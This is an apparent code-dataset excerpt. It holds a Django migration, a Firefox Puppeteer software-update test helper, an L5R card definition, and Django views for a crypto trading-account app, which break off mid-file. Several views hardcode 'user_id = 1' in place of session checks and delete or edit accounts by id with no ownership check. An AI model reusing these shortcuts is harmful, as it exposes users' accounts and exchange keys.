selector[\"service\"] = {\n \"id\": obj.service.pk,\n \"name\": obj.service.prototype.display_name,\n }\n selector[\"component\"] = {\"id\": obj.pk, \"name\": obj.prototype.display_name}\n elif obj.prototype.type == \"host\":\n selector[\"host\"] = {\"id\": obj.pk, \"name\": obj.fqdn}\n if task.action and task.action.host_action:\n context = _get_host_action_context(apps, obj, task)\n selector.update(context)\n else:\n selector[\"provider\"] = {\n \"id\": obj.provider.pk,\n \"name\": obj.provider.name,\n }\n\n task.selector = selector\n task.save(update_fields=[\"selector\"])\n task.joblog_set.filter().update(selector=selector)\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n (\"cm\", \"0091_migrate_adcm_logrotate_config\"),\n ]\n\n operations = [\n migrations.AlterField(\n model_name=\"prototype\",\n name=\"type\",\n field=models.CharField(\n choices=[\n (\"adcm\", \"adcm\"),\n (\"cluster\", \"cluster\"),\n (\"service\", \"service\"),\n (\"component\", \"component\"),\n (\"provider\", \"provider\"),\n (\"host\", \"host\"),\n ],\n max_length=16,\n ),\n ),\n migrations.AlterField(\n model_name=\"stageprototype\",\n name=\"type\",\n field=models.CharField(\n choices=[\n (\"adcm\", \"adcm\"),\n (\"cluster\", \"cluster\"),\n (\"service\", \"service\"),\n (\"component\", \"component\"),\n (\"provider\", \"provider\"),\n (\"host\", \"host\"),\n ],\n max_length=16,\n ),\n ),\n migrations.RunPython(get_selector),\n ]\n","repo_name":"arenadata/adcm","sub_path":"python/cm/migrations/0092_auto_20220906_0957.py","file_name":"0092_auto_20220906_0957.py","file_ext":"py","file_size_in_byte":7183,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"13715372007","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport os\nimport re\n\nimport mozinfo\n\nfrom firefox_puppeteer.base import BaseLib\nfrom firefox_puppeteer.api.appinfo import AppInfo\nfrom firefox_puppeteer.api.prefs import Preferences\n\n\nclass ActiveUpdate(BaseLib):\n\n def __getattr__(self, attr):\n value = self.marionette.execute_script(\"\"\"\n let ums = Components.classes['@mozilla.org/updates/update-manager;1']\n .getService(Components.interfaces.nsIUpdateManager);\n return ums.activeUpdate[arguments[0]];\n \"\"\", script_args=[attr])\n\n if value:\n return value\n else:\n raise AttributeError('{} has no attribute {}'.format(self.__class__.__name__,\n attr))\n\n @property\n def exists(self):\n \"\"\"Checks if there is an active update.\n\n :returns: True if there is an active update\n \"\"\"\n active_update = self.marionette.execute_script(\"\"\"\n let ums = Components.classes['@mozilla.org/updates/update-manager;1']\n .getService(Components.interfaces.nsIUpdateManager);\n return ums.activeUpdate;\n \"\"\")\n\n return bool(active_update)\n\n def get_patch_at(self, patch_index):\n \"\"\"Use nsIUpdate.getPatchAt to return a patch from an update.\n\n :returns: JSON data for an nsIUpdatePatch object\n \"\"\"\n return self.marionette.execute_script(\"\"\"\n let ums = Components.classes['@mozilla.org/updates/update-manager;1']\n .getService(Components.interfaces.nsIUpdateManager);\n return ums.activeUpdate.getPatchAt(arguments[0]);\n \"\"\", script_args=[patch_index])\n\n @property\n def patch_count(self):\n \"\"\"Get the patchCount from the active update.\n\n :returns: The patch count\n \"\"\"\n return self.marionette.execute_script(\"\"\"\n let ums = Components.classes['@mozilla.org/updates/update-manager;1']\n .getService(Components.interfaces.nsIUpdateManager);\n return ums.activeUpdate.patchCount;\n \"\"\")\n\n @property\n def selected_patch(self):\n \"\"\"Get the selected patch for the active update.\n\n :returns: JSON data for the selected patch\n \"\"\"\n return self.marionette.execute_script(\"\"\"\n let ums = Components.classes['@mozilla.org/updates/update-manager;1']\n .getService(Components.interfaces.nsIUpdateManager);\n return ums.activeUpdate.selectedPatch;\n \"\"\")\n\n\nclass MARChannels(BaseLib):\n \"\"\"Class to handle the allowed MAR channels as listed in update-settings.ini.\"\"\"\n INI_SECTION = 'Settings'\n INI_OPTION = 'ACCEPTED_MAR_CHANNEL_IDS'\n\n def __init__(self, marionette_getter):\n BaseLib.__init__(self, marionette_getter)\n\n self._ini_file_path = self.marionette.execute_script(\"\"\"\n Components.utils.import('resource://gre/modules/Services.jsm');\n\n let file = Services.dirsvc.get('GreD', Components.interfaces.nsIFile);\n file.append('update-settings.ini');\n\n return file.path;\n \"\"\")\n\n @property\n def config_file_path(self):\n \"\"\"The path to the update-settings.ini file.\"\"\"\n return self._ini_file_path\n\n @property\n def config_file_contents(self):\n \"\"\"The contents of the update-settings.ini file.\"\"\"\n with open(self.config_file_path) as f:\n return f.read()\n\n @property\n def channels(self):\n \"\"\"The channels as found in the ACCEPTED_MAR_CHANNEL_IDS option\n of the update-settings.ini file.\n\n :returns: A set of channel names\n \"\"\"\n channels = self.marionette.execute_script(\"\"\"\n Components.utils.import(\"resource://gre/modules/FileUtils.jsm\");\n let iniFactory = Components.classes['@mozilla.org/xpcom/ini-processor-factory;1']\n .getService(Components.interfaces.nsIINIParserFactory);\n\n let file = new FileUtils.File(arguments[0]);\n let parser = iniFactory.createINIParser(file);\n\n return parser.getString(arguments[1], arguments[2]);\n \"\"\", script_args=[self.config_file_path, self.INI_SECTION, self.INI_OPTION])\n return set(channels.split(','))\n\n @channels.setter\n def channels(self, channels):\n \"\"\"Set the channels in the update-settings.ini file.\n\n :param channels: A set of channel names\n \"\"\"\n new_channels = ','.join(channels)\n self.marionette.execute_script(\"\"\"\n Components.utils.import(\"resource://gre/modules/FileUtils.jsm\");\n let iniFactory = Components.classes['@mozilla.org/xpcom/ini-processor-factory;1']\n .getService(Components.interfaces.nsIINIParserFactory);\n\n let file = new FileUtils.File(arguments[0]);\n\n let writer = iniFactory.createINIParser(file)\n .QueryInterface(Components.interfaces.nsIINIParserWriter);\n\n writer.setString(arguments[1], arguments[2], arguments[3]);\n writer.writeFile(null, Components.interfaces.nsIINIParserWriter.WRITE_UTF16);\n \"\"\", script_args=[self.config_file_path, self.INI_SECTION, self.INI_OPTION, new_channels])\n\n def add_channels(self, channels):\n \"\"\"Add channels to the update-settings.ini file.\n\n :param channels: A set of channel names to add\n \"\"\"\n self.channels = self.channels | set(channels)\n\n def remove_channels(self, channels):\n \"\"\"Remove channels from the update-settings.ini file.\n\n :param channels: A set of channel names to remove\n \"\"\"\n self.channels = self.channels - set(channels)\n\n\nclass SoftwareUpdate(BaseLib):\n \"\"\"The SoftwareUpdate API adds support for an easy access to the update process.\"\"\"\n PREF_APP_DISTRIBUTION = 'distribution.id'\n PREF_APP_DISTRIBUTION_VERSION = 'distribution.version'\n PREF_APP_UPDATE_URL = 'app.update.url'\n PREF_APP_UPDATE_URL_OVERRIDE = 'app.update.url.override'\n PREF_DISABLED_ADDONS = 'extensions.disabledAddons'\n\n def __init__(self, marionette_getter):\n BaseLib.__init__(self, marionette_getter)\n\n self.app_info = AppInfo(marionette_getter)\n self.prefs = Preferences(marionette_getter)\n\n self._update_channel = UpdateChannel(marionette_getter)\n self._mar_channels = MARChannels(marionette_getter)\n self._active_update = ActiveUpdate(marionette_getter)\n\n @property\n def ABI(self):\n \"\"\"Get the customized ABI for the update service.\n\n :returns: ABI version\n \"\"\"\n abi = self.app_info.XPCOMABI\n if mozinfo.isMac:\n abi += self.marionette.execute_script(\"\"\"\n let macutils = Components.classes['@mozilla.org/xpcom/mac-utils;1']\n .getService(Components.interfaces.nsIMacUtils);\n if (macutils.isUniversalBinary) {\n return '-u-' + macutils.architecturesInBinary;\n }\n return '';\n \"\"\")\n\n return abi\n\n @property\n def active_update(self):\n \"\"\" Holds a reference to an :class:`ActiveUpdate` object.\"\"\"\n return self._active_update\n\n @property\n def allowed(self):\n \"\"\"Check if the user has permissions to run the software update\n\n :returns: Status if the user has the permissions\n \"\"\"\n return self.marionette.execute_script(\"\"\"\n let aus = Components.classes['@mozilla.org/updates/update-service;1']\n .getService(Components.interfaces.nsIApplicationUpdateService);\n return aus.canCheckForUpdates && aus.canApplyUpdates;\n \"\"\")\n\n @property\n def build_info(self):\n \"\"\"Return information of the current build version\n\n :returns: A dictionary of build information\n \"\"\"\n return {\n 'buildid': self.app_info.appBuildID,\n 'channel': self.update_channel.channel,\n 'disabled_addons': self.prefs.get_pref(self.PREF_DISABLED_ADDONS),\n 'locale': self.app_info.locale,\n 'mar_channels': self.mar_channels.channels,\n 'url_aus': self.get_update_url(True),\n 'user_agent': self.app_info.user_agent,\n 'version': self.app_info.version\n }\n\n @property\n def is_complete_update(self):\n \"\"\"Return true if the offered update is a complete update\n\n :returns: True if the offered update is a complete update\n \"\"\"\n # Throw when isCompleteUpdate is called without an update. This should\n # never happen except if the test is incorrectly written.\n assert self.active_update.exists, 'An active update has been found'\n\n patch_count = self.active_update.patch_count\n assert patch_count == 1 or patch_count == 2,\\\n 'An update must have one or two patches included'\n\n # Ensure Partial and Complete patches produced have unique urls\n if patch_count == 2:\n patch0_url = self.active_update.get_patch_at(0)['URL']\n patch1_url = self.active_update.get_patch_at(1)['URL']\n assert patch0_url != patch1_url,\\\n 'Partial and Complete download URLs are different'\n\n return self.active_update.selected_patch['type'] == 'complete'\n\n @property\n def mar_channels(self):\n \"\"\" Holds a reference to a :class:`MARChannels` object.\"\"\"\n return self._mar_channels\n\n @property\n def os_version(self):\n \"\"\"Returns information about the OS version\n\n :returns: The OS version\n \"\"\"\n return self.marionette.execute_script(\"\"\"\n Components.utils.import(\"resource://gre/modules/Services.jsm\");\n\n let osVersion;\n try {\n osVersion = Services.sysinfo.getProperty(\"name\") + \" \" +\n Services.sysinfo.getProperty(\"version\");\n }\n catch (ex) {\n }\n\n if (osVersion) {\n try {\n osVersion += \" (\" + Services.sysinfo.getProperty(\"secondaryLibrary\") + \")\";\n }\n catch (e) {\n // Not all platforms have a secondary widget library,\n // so an error is nothing to worry about.\n }\n osVersion = encodeURIComponent(osVersion);\n }\n return osVersion;\n \"\"\")\n\n @property\n def patch_info(self):\n \"\"\" Returns information of the active update in the queue.\"\"\"\n info = {'channel': self.update_channel.channel}\n\n if (self.active_update.exists):\n info['buildid'] = self.active_update.buildID\n info['is_complete'] = self.is_complete_update\n info['size'] = self.active_update.selected_patch['size']\n info['type'] = self.update_type\n info['url_mirror'] = \\\n self.active_update.selected_patch['finalURL'] or 'n/a'\n info['version'] = self.active_update.appVersion\n\n return info\n\n @property\n def staging_directory(self):\n \"\"\" Returns the path to the updates staging directory.\"\"\"\n return self.marionette.execute_script(\"\"\"\n let aus = Components.classes['@mozilla.org/updates/update-service;1']\n .getService(Components.interfaces.nsIApplicationUpdateService);\n return aus.getUpdatesDirectory().path;\n \"\"\")\n\n @property\n def update_channel(self):\n \"\"\" Holds a reference to an :class:`UpdateChannel` object.\"\"\"\n return self._update_channel\n\n @property\n def update_type(self):\n \"\"\"Returns the type of the active update.\"\"\"\n return self.active_update.type\n\n def force_fallback(self):\n \"\"\"Update the update.status file and set the status to 'failed:6'\"\"\"\n with open(os.path.join(self.staging_directory, 'update.status'), 'w') as f:\n f.write('failed: 6\\n')\n\n def get_update_url(self, force=False):\n \"\"\"Retrieve the AUS update URL the update snippet is retrieved from\n\n :param force: Boolean flag to force an update check\n\n :returns: The URL of the update snippet\n \"\"\"\n url = self.prefs.get_pref(self.PREF_APP_UPDATE_URL_OVERRIDE)\n\n if not url:\n url = self.prefs.get_pref(self.PREF_APP_UPDATE_URL)\n\n # get the next two prefs from the default branch\n dist = self.prefs.get_pref(self.PREF_APP_DISTRIBUTION, True) or 'default'\n dist_version = self.prefs.get_pref(self.PREF_APP_DISTRIBUTION_VERSION,\n True) or 'default'\n\n # Not all placeholders are getting replaced correctly by formatURL\n url = url.replace('%PRODUCT%', self.app_info.name)\n url = url.replace('%BUILD_ID%', self.app_info.appBuildID)\n url = url.replace('%BUILD_TARGET%', self.app_info.OS + '_' + self.ABI)\n url = url.replace('%OS_VERSION%', self.os_version)\n url = url.replace('%CHANNEL%', self.update_channel.channel)\n url = url.replace('%DISTRIBUTION%', dist)\n url = url.replace('%DISTRIBUTION_VERSION%', dist_version)\n\n url = self.marionette.execute_script(\"\"\"\n Components.utils.import(\"resource://gre/modules/Services.jsm\");\n return Services.urlFormatter.formatURL(arguments[0]);\n \"\"\", script_args=[url])\n\n if force:\n if '?' in url:\n url += '&'\n else:\n url += '?'\n url += 'force=1'\n\n return url\n\n\nclass UpdateChannel(BaseLib):\n \"\"\"Class to handle the update channel as listed in channel-prefs.js\"\"\"\n REGEX_UPDATE_CHANNEL = re.compile(r'(\"app\\.update\\.channel\", \")([^\"].*)(?=\")')\n\n def __init__(self, marionette_getter):\n BaseLib.__init__(self, marionette_getter)\n\n self.prefs = Preferences(marionette_getter)\n\n self.file_path = self.marionette.execute_script(\"\"\"\n Components.utils.import('resource://gre/modules/Services.jsm');\n\n let file = Services.dirsvc.get('PrfDef', Components.interfaces.nsIFile);\n file.append('channel-prefs.js');\n\n return file.path;\n \"\"\")\n\n @property\n def file_contents(self):\n \"\"\"The contents of the channel-prefs.js file.\"\"\"\n with open(self.file_path) as f:\n return f.read()\n\n @property\n def channel(self):\n \"\"\"The name of the update channel as stored in the\n app.update.channel pref.\"\"\"\n return self.prefs.get_pref('app.update.channel', True)\n\n @property\n def default_channel(self):\n \"\"\"Get the default update channel\n\n :returns: Current default update channel\n \"\"\"\n matches = re.search(self.REGEX_UPDATE_CHANNEL, self.file_contents).groups()\n assert len(matches) == 2, 'Update channel value has been found'\n\n return matches[1]\n\n @default_channel.setter\n def default_channel(self, channel):\n \"\"\"Set default update channel.\n\n :param channel: New default update channel\n \"\"\"\n assert channel, 'Update channel has been specified'\n new_content = re.sub(\n self.REGEX_UPDATE_CHANNEL, r'\\g<1>' + channel, self.file_contents)\n with open(self.file_path, 'w') as f:\n f.write(new_content)\n","repo_name":"classilla/tenfourfox","sub_path":"testing/puppeteer/firefox/firefox_puppeteer/api/software_update.py","file_name":"software_update.py","file_ext":"py","file_size_in_byte":15455,"program_lang":"python","lang":"en","doc_type":"code","stars":251,"dataset":"github-code","pt":"37"} +{"seq_id":"34020812863","text":"from __future__ import annotations\n\nfrom dataclasses import dataclass, field\nfrom typing import TYPE_CHECKING\n\nfrom l5r_auto.abilities import Ability\nfrom l5r_auto.cards.followers.common import Follower\nfrom l5r_auto.cards.personalities.common import PersonalityEntity\nfrom l5r_auto.cards.strongholds.common import Stronghold\nfrom l5r_auto.clans import UnicornClan\nfrom l5r_auto.keywords import Cavalry\nfrom l5r_auto.legality import DiamondEdition, GoldEdition, JadeEdition\nfrom l5r_auto.utils import is_entity_of_type\n\nif TYPE_CHECKING:\n from l5r_auto.cards import Entity\n from l5r_auto.play import Game\n from l5r_auto.player import Player\n\n# Northern Provinces of the Moto\n\n\n@dataclass(repr=False, kw_only=True)\nclass ProduceGoldForCavalry(Ability):\n \"\"\"w: When paying for a Cavalry Follower, produce 7 Gold that may only pay for it.\"\"\"\n\n base_gold_amount: int\n gold_amount: int\n\n def on_pay(self, game: Game, player: Player, entity: Entity) -> int:\n if is_entity_of_type(entity, Follower) and Cavalry in entity.keywords:\n return self.gold_amount\n else:\n return self.base_gold_amount\n\n\n@dataclass(repr=False, kw_only=True)\nclass NorthernProvincesBattleAbility(Ability):\n \"\"\"Repeatable Tireless Battle: Target your two unbowed Cavalry Personalities that this action has not targeted this turn, one of whom may be at any location. Switch their locations.\"\"\"\n\n repeatable: bool = True\n tireless: bool = True\n battle: bool = True\n\n targeted_this_turn: list[PersonalityEntity] = field(\n default_factory=list, init=False\n )\n\n def gather_legal_target_entities(\n self, game: Game, active_player: Player\n ) -> list[PersonalityEntity]:\n return [\n x\n for x in active_player.play_area\n if is_entity_of_type(x, PersonalityEntity)\n and Cavalry in x.keywords\n and not x.bowed\n and x not in self.targeted_this_turn\n ]\n\n def get_effect(\n self,\n game: Game,\n active_player: Player,\n targets: tuple[PersonalityEntity, PersonalityEntity],\n ):\n one_cavalry, two_cavalry = targets\n one_location = one_cavalry.location\n two_location = two_cavalry.location\n one_cavalry.move_to(two_location)\n two_cavalry.move_to(one_location)\n\n def pay_cost(self, game: Game, entity: PersonalityEntity) -> bool:\n return True\n\n\nNorthernProvincesOfTheMoto = Stronghold(\n card_id=5625,\n title=\"Northern Provinces of the Moto\",\n province_strength=7,\n gold_production=\"5\",\n starting_family_honor=4,\n clan=[UnicornClan],\n abilities=[\n ProduceGoldForCavalry(base_gold_amount=5, gold_amount=7),\n NorthernProvincesBattleAbility(),\n ],\n legality=[DiamondEdition, JadeEdition, GoldEdition],\n)\n","repo_name":"aubustou/l5r","sub_path":"l5r_auto/cards/strongholds/unicorn/soul_of_the_empire.py","file_name":"soul_of_the_empire.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35859449478","text":"import threading\nimport time\nimport math\nimport re\nimport json\n\nfrom urllib import parse\nfrom django.db.models import Q\nfrom django.shortcuts import render, redirect, HttpResponse\nfrom .models import Account, Property, LastdayAssets, Market, Robot, TradingPlatform, OrderInfo\nfrom .forms import AccountModelForm, RobotFrom, EditAccountFrom\nfrom apps.rbac.models import UserInfo\nfrom django.core.paginator import Paginator\nfrom apps.deal.asset.get_assets import GetAssets\nfrom dealapi.exx.exxMarket import MarketCondition\nfrom dealapi.exx.exxService import ExxService\nfrom apps.deal.Strategy.Grid import GridStrategy\nfrom django.contrib.sessions.models import Session\n\nfrom django.core.exceptions import ValidationError\nfrom rest_framework.response import Response\nfrom rest_framework import serializers\nfrom utils import restful\nfrom utils.mixin import LoginRequireMixin\nfrom rest_framework import generics\nfrom django.core.serializers import serialize\nfrom apps.deal.serializers import AccountSerializer, RobotSerializer, OrderInfoSerializer, LastdayAssetsSerializer, PropertySerializer, PlatformSerializer\nfrom apps.rbac.serializers import UserSerializer\n\n# Create your views here.\n\n\n# class AccountList(LoginRequireMixin, generics.CreateAPIView):\nclass AccountList(generics.CreateAPIView):\n \"\"\"\n 显示用户所有账户信息\n \"\"\"\n serializer_class = AccountSerializer\n\n def get(self, request):\n pageNum = request.GET.get('pageIndex', 1)\n pagesize = request.GET.get('pageSize')\n # 获取用户id\n try:\n sessionid = request.META.get(\"HTTP_SESSIONID\")\n session_data = Session.objects.get(session_key=sessionid)\n user_id = session_data.get_decoded().get('user_id')\n except Exception as e:\n print(e)\n # user_id = 1\n if not user_id:\n return restful.params_error(message='账户失效,请重新登陆!')\n # 获取账户信息\n accounts = Account.objects.filter(users__id=user_id)\n # 分页\n try:\n paginator = Paginator(Account.objects.filter(users__id=user_id), 3)\n page_obj = paginator.page(int(pageNum))\n except:\n return restful.params_error(message='页码错误')\n # 获取勾选币种\n currency_list = Property.objects.filter(currency_status='1').values(\"currency\",).distinct()\n ret = list(currency_list)\n data = json.dumps(ret)\n # data = PropertySerializer(currency_list, fields=('currency',), many=True).data\n print(data)\n numPerPage = len(page_obj.object_list)\n totalCount = accounts.count()\n totalPageNum = paginator.num_pages\n\n context = {\n 'numPerPage': numPerPage,\n 'PageNum': int(pageNum),\n 'result': AccountSerializer(page_obj.object_list, many=True).data,\n # 'result': AccountSerializer(page_obj.object_list, fields=('id', 'title'), many=True).data,\n 'totalCount': totalCount,\n 'totalPageNum': totalPageNum,\n 'currency_list': data,\n }\n # print(context)\n return restful.result(data=context)\n\n\nclass GetCurrencies(generics.CreateAPIView):\n \"\"\"\n 获取用户所有币种\n \"\"\"\n def get(self, request):\n # 获取用户所有币种\n # sessionid = request.META.get(\"HTTP_SESSIONID\")\n # session_data = Session.objects.get(session_key=sessionid)\n # user_id = session_data.get_decoded().get('user_id')\n user_id = 1\n if user_id:\n currency_list = Property.objects.filter(account__users__id=user_id).values(\"currency\",).distinct()\n ret = list(currency_list)\n # currency_list = serialize('json', currency_list)\n data = json.dumps(ret)\n return restful.result(data=data)\n else:\n return restful.params_error(message='未获取到账户登陆信息,请检查是否登陆')\n\n\nclass AddAccount(generics.CreateAPIView):\n \"\"\"\n 添加账户\n \"\"\"\n # queryset = Account.objects.get_queryset().order_by('id')\n serializer_class = AccountSerializer\n\n def get(self, request):\n platform = TradingPlatform.objects.all()\n data = PlatformSerializer(platform, many=True).data\n return restful.result(message=data)\n\n def post(self, request):\n model_form = AccountModelForm(request.POST)\n if model_form.is_valid():\n # save()返回一个还未保存至数据库的对象,用这个对象添加一些额外的数据,然后在用save()保存到数据库\n obj = model_form.save(commit=False)\n # sessionid = request.META.get(\"HTTP_SESSIONID\")\n # session_data = Session.objects.get(session_key=sessionid)\n # user_id = session_data.get_decoded().get('user_id')\n user_id = 1\n user_obj = UserInfo.objects.get(id=user_id)\n # 添加数据需为模型类对象\n obj.users = user_obj\n obj.save()\n accounts = Account.objects.filter(Q(title=obj) & Q(platform=model_form.cleaned_data['platform']))\n currency = Property.objects.values(\"currency\").distinct()\n\n print(accounts, currency)\n # 给新账户添加币种\n for account in accounts:\n for cur in currency:\n LastdayAssets.objects.create(currency=cur['currency'], account=account)\n Property.objects.create(currency=cur['currency'], account=account, currency_status=0)\n return restful.ok()\n else:\n return restful.params_error(model_form.get_errors())\n\n\ndef accountinfo(request):\n accout_id = request.POST.get('id')\n account = Account.objects.get(id=accout_id)\n serialize = AccountSerializer(account)\n print(serialize.data)\n return restful.result(data=serialize.data)\n\n\nclass EditAccount(generics.ListCreateAPIView):\n \"\"\"\n get:\n 获取要修改账户信息.\n post:\n 提交修改信息.\n \"\"\"\n serializer_class = AccountSerializer\n\n def get(self, request):\n account_id = request.GET.get('account_id')\n if account_id:\n account = Account.objects.get(id=account_id)\n account = AccountSerializer(account)\n return restful.result(data=account.data)\n else:\n return restful.params_error(message='参数为空')\n\n def post(self, request):\n form = EditAccountFrom(request.POST)\n if form.is_valid():\n title = form.cleaned_data.get('title')\n accesskey = form.cleaned_data.get('accesskey')\n secretkey = form.cleaned_data.get('secretkey')\n platform = form.cleaned_data.get('platform')\n pk = form.cleaned_data.get('id')\n # sessionid = request.META.get(\"HTTP_SESSIONID\")\n # session_data = Session.objects.get(session_key=sessionid)\n # user_id = session_data.get_decoded().get('user_id')\n user_id = 1\n print(title, accesskey, secretkey, platform, pk, user_id)\n Account.objects.filter(pk=pk).update(title=title, accesskey=accesskey, secretkey=secretkey,\n platform=platform, users=user_id)\n return restful.ok()\n else:\n return restful.params_error(form.get_errors())\n\n\nclass DeleteAccount(generics.CreateAPIView):\n \"\"\"\n 删除账户\n \"\"\"\n serializer_class = AccountSerializer\n\n def post(self, request):\n pk = request.POST.get('id')\n try:\n Account.objects.filter(id=pk).delete()\n return restful.ok()\n except:\n return restful.params_error(message=\"该账户不存在\")\n\n\nclass ShowAssert(generics.CreateAPIView):\n \"\"\"\n 显示账户资产信息\n \"\"\"\n serializer_class = AccountSerializer\n\n def post(self, request):\n id = request.POST.get('id')\n if id:\n # 获取账户信息\n account_obj = Account.objects.get(id=id)\n # 账户对应的平台\n platform = account_obj.platform\n # 创建对象\n print(id, platform)\n con = GetAssets(id, account_obj, platform)\n data = con.showassets()\n return restful.result(data=data)\n else:\n return restful.params_error(message='参数为空')\n\n\nclass ShowCollectAsset(generics.CreateAPIView):\n \"\"\"\n 汇总资产信息\n \"\"\"\n serializer_class = AccountSerializer\n\n def post(self, request):\n data = request.body.decode(\"utf-8\")\n currency_data = json.loads(data) # 反序列化\n account_list = currency_data.get('id')\n if account_list:\n accounts = account_list\n else:\n return restful.result(data='')\n # user_id = request.session.get(\"user_id\")\n # user_id = 1\n # account_lists = Account.objects.filter(users=user_id)\n # for account in account_lists:\n # accounts = list()\n # accounts.append(account.id)\n\n flag = True\n context_list = list()\n for id in accounts:\n print(\"*\" * 20, id)\n # 获取账户信息\n account_obj = Account.objects.get(id=id)\n # 账户对应的平台\n platform = account_obj.platform\n # 创建对象\n con = GetAssets(id, account_obj, platform, flag)\n context = con.showassets()\n context_list.append(context)\n print('******', context_list)\n # 汇总资产表数据\n for key in context_list[0]['assets_dict']:\n for elem in context_list[1:]:\n for key1, value1 in elem['assets_dict'][key].items():\n if key1 is 'last':\n continue\n elif key1 in context_list[0]['assets_dict'][key]:\n context_list[0]['assets_dict'][key][key1] = \\\n float(context_list[0]['assets_dict'][key][key1]) + float(value1)\n else:\n context_list[0]['assets_dict'][key][key1] = value1\n # 损益表汇总数据\n for key in context_list[0]['profit_loss_dict']:\n for elem in context_list[1:]:\n for key1, value1 in elem['profit_loss_dict'][key].items():\n if key1 is 'last':\n continue\n elif key1 in context_list[0]['profit_loss_dict'][key]:\n context_list[0]['profit_loss_dict'][key][key1] = \\\n float(context_list[0]['profit_loss_dict'][key][key1]) + float(value1)\n else:\n context_list[0]['profit_loss_dict'][key][key1] = value1\n # 汇总资产变化/初始总资产/历史盈亏/\n print('资产汇总', '-' * 20)\n print(context_list[0])\n return restful.result(data=context_list[0])\n\n\nclass ChargeAccount(generics.CreateAPIView):\n \"\"\"\n 增资\n \"\"\"\n serializer_class = AccountSerializer\n\n def post(self, request):\n id = request.POST.get('id')\n currency = request.POST.get('currency')\n num = request.POST.get('num')\n print(id, currency, num)\n if id and currency and num:\n account_obj = Account.objects.get(id=id) # 获取账户信息\n platform = account_obj.platform # 账户对应的平台\n # 根据平台调用对应接口\n try:\n if str(platform) == 'EXX':\n currency_pair = currency.lower() + '_usdt'\n market_api = MarketCondition(currency_pair)\n info = market_api.get_ticker() # 获取EXX单个交易对行情信息\n info = info['ticker']['last']\n elif str(platform) == 'HUOBI':\n pass\n except:\n print('未获取到该币种当前价')\n info = 1\n try:\n property_obj = Property.objects.get(Q(account_id=id) & Q(currency=currency))\n original_assets = float(property_obj.original_assets) + float(num) * float(info)\n print('/-'*10, original_assets)\n Property.objects.filter(Q(account_id=id) & Q(currency=currency)).update(original_assets=original_assets)\n return restful.ok()\n except:\n return restful.params_error(message='账户没有此币种')\n else:\n return restful.params_error(message='参数为空')\n\n\nclass WithDraw(generics.CreateAPIView):\n \"\"\"\n 提币\n \"\"\"\n serializer_class = AccountSerializer\n\n def post(self, request):\n id = request.POST.get('id')\n currency = request.POST.get('currency')\n num = request.POST.get('num')\n if id and currency and num:\n account_obj = Account.objects.get(id=id) # 获取账户信息\n platform = account_obj.platform # 账户对应的平台\n # 根据平台调用对应接口\n try:\n if str(platform) == 'EXX':\n currency_pair = currency.lower() + '_usdt'\n market_api = MarketCondition(currency_pair)\n info = market_api.get_ticker() # 获取EXX单个交易对行情信息\n last = info['ticker']['last']\n elif str(platform) == 'HUOBI':\n pass\n except:\n print('未获取到该币种当前价')\n last = 1\n if currency:\n # 提币折合成usdt\n property_obj = Property.objects.get(Q(account_id=id) & Q(currency=currency))\n withdraw_record = float(property_obj.withdraw_record) + float(num) * float(last)\n Property.objects.filter(Q(account_id=id) & Q(currency=currency)).update(withdraw_record=withdraw_record)\n return restful.ok()\n else:\n return restful.params_error(message='参数为空')\n\n\nclass ConfigCurrency(generics.CreateAPIView):\n \"\"\"\n 币种新增/配置\n \"\"\"\n serializer_class = AccountSerializer\n\n def post(self, request):\n currency = request.POST.get('currency')\n currency_list = list()\n currency_list.append(currency)\n if currency_list:\n # sessionid = request.META.get(\"HTTP_SESSIONID\")\n # session_data = Session.objects.get(session_key=sessionid)\n # user_id = session_data.get_decoded().get('user_id')\n user_id = 1\n accounts = Account.objects.filter(users=user_id)\n for account in accounts:\n for currency in currency_list:\n if currency:\n # 账户存在此币种则不添加\n property_obj = Property.objects.filter(Q(account=account.id) & Q(currency=currency))\n print('+' * 30, list(property_obj))\n if not list(property_obj):\n # 保存币种信息\n LastdayAssets.objects.create(currency=currency, account=account)\n Property.objects.create(currency=currency, account=account, currency_status=0)\n else:\n return restful.params_error(message='请选择账户币种')\n # 返回数据为json格式\n data = Property.objects.values(\"currency\").distinct()\n return restful.result(data=list(data))\n else:\n return restful.params_error(message='请选择账户币种')\n\n\nclass SelectCurrency(generics.CreateAPIView):\n \"\"\"\n 勾选的币种\n \"\"\"\n serializer_class = AccountSerializer\n\n def post(self, request):\n data = request.body.decode(\"utf-8\")\n print(data)\n currency_data = json.loads(data)\n currency_list = currency_data.get('currency')\n if currency_list:\n Property.objects.values(\"currency\").update(currency_status='0')\n LastdayAssets.objects.values(\"currency\").update(currency_status='0')\n for cur in list(currency_list):\n Property.objects.filter(currency=cur).update(currency_status='1')\n LastdayAssets.objects.filter(currency=cur).update(currency_status='1')\n return restful.ok()\n else:\n return restful.params_error(message='参数为空')\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# 创建机器人\nclass CreateRobot(generics.CreateAPIView):\n \"\"\"\n 获取配置策略的参数\n \"\"\"\n serializer_class = AccountSerializer\n\n def post(self, request):\n try:\n robot_data = request.body.decode(\"utf-8\")\n currency_data = json.loads(robot_data)\n id = currency_data.get('trading_account')\n account_obj = Account.objects.get(id=id)\n del currency_data['trading_account']\n # Robot.objects.filter(id=5).update(**currency_data)\n Robot.objects.create(**currency_data, trading_account=account_obj)\n return restful.ok()\n except Exception as e:\n print(e)\n\n\ndef get_account_info(currency, market, id):\n \"\"\"\n 获取用户信息\n :param currency: 交易币种\n :param market: 交易市场\n :param id: 机器人id\n :return:\n \"\"\"\n # 获取账户所属的用户信息\n account_obj = Account.objects.get(id=id)\n # 账户对应的平台\n platform = account_obj.platform\n # 获取用户信息\n user_obj = UserInfo.objects.all()\n if str(platform) == 'EXX':\n # 创建交易接口对象---------------------------------------------------------------------API\n service_obj = ExxService(account_obj.secretkey, account_obj.accesskey)\n # 创建行情接口对象\n currency_pair = currency.lower() + '_' + market.lower()\n market_obj = MarketCondition(currency_pair)\n\n elif str(platform) == 'HUOBI':\n pass\n\n return user_obj, service_obj, market_obj\n\n\nclass SearchRobot(generics.CreateAPIView):\n \"\"\"\n 机器人搜索\n \"\"\"\n def post(self, 